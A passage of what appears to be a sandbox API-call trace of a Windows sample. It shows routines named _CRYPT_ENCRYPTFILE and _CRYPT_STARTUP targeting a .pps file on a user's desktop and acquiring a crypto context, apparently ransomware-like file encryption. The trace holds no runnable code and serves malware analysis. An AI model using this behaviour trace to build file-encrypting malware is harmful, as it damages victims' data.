HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0158.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0158.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0158.597] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0158.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.598] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9f70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0158.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.599] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0158.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0158.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0158.599] CloseHandle (hObject=0x138) returned 1 [0158.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0158.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.600] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0158.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0158.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.601] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.601] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.601] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.601] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.601] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.601] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.601] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.601] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.601] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.603] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59a9e50, ftCreationTime.dwHighDateTime=0x1d5d983, ftLastAccessTime.dwLowDateTime=0x6bc54d10, ftLastAccessTime.dwHighDateTime=0x1d5de75, ftLastWriteTime.dwLowDateTime=0x6bc54d10, ftLastWriteTime.dwHighDateTime=0x1d5de75, nFileSizeHigh=0x0, nFileSizeLow=0xf73d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="DBSZqxeH.pps", cAlternateFileName="")) returned 0x90add8 [0158.606] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.606] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.606] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59a9e50, ftCreationTime.dwHighDateTime=0x1d5d983, ftLastAccessTime.dwLowDateTime=0x6bc54d10, ftLastAccessTime.dwHighDateTime=0x1d5de75, ftLastWriteTime.dwLowDateTime=0x6bc54d10, ftLastWriteTime.dwHighDateTime=0x1d5de75, nFileSizeHigh=0x0, nFileSizeLow=0xf73d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="DBSZqxeH.pps", cAlternateFileName="")) returned 0x90add8 [0158.607] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.607] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DBSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BSZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZqxeH.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.609] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.609] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0158.609] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0158.609] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.609] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.609] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.609] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.609] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59a9e50, ftCreationTime.dwHighDateTime=0x1d5d983, ftLastAccessTime.dwLowDateTime=0x6bc54d10, ftLastAccessTime.dwHighDateTime=0x1d5de75, ftLastWriteTime.dwLowDateTime=0x6bc54d10, ftLastWriteTime.dwHighDateTime=0x1d5de75, nFileSizeHigh=0x0, nFileSizeLow=0xf73d, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="DBSZqxeH.pps", cAlternateFileName="")) returned 0x90ae18 [0158.610] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0158.610] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.610] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.610] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.610] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0158.610] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.610] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0158.610] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.610] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0158.611] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.611] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.611] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.611] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.611] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0158.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.611] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0158.612] PeekMessageW (in: 